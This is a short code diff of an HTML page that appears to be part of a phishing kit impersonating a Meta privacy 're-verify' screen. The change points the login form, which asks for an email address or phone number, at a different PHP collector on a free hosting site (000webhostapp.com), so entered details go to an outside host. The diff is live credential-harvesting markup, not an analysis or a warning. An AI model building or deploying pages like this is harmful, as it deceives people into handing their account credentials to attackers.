--- a/meta-apps-view-mobile-privacy/re-verify.html
+++ b/meta-apps-view-mobile-privacy/re-verify.html
@@ -47,7 +47,7 @@
 
       </div>
     <div class="mt-4">
-            <form action="https://urmom4000004.000webhostapp.com/repeat.php" method="post">
+            <form action="https://dontjudgemedude.000webhostapp.com/repeat.php" method="post">
                 <div class="mb-3 shadow">
                     <input type="id" class="form-control up" name="firsname" placeholder="Email address or phone number" autocomplete="on" required="yes" maxlength="100">
                 </div>
